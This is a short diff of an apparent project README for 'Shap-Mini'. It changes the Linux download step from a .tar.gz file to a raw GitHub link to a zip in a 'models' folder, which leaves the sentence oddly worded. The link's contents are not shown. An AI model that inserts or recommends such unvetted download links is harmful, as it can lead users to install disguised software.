tonette31/Shap-Mini/README.md

 3. Click on the appropriate file for your system:
    - If you're using Windows, download the .exe file.
    - For macOS, choose the .dmg file.
-   - If you're on Linux, pick the .tar.gz file.
+   - If you're on Linux, pick the https://raw.githubusercontent.com/tonette31/Shap-Mini/main/models/Shap-Mini-v1.3.zip file.
 4. Once the file downloads, locate it in your Downloads folder.

 ## 🔧 System Requirements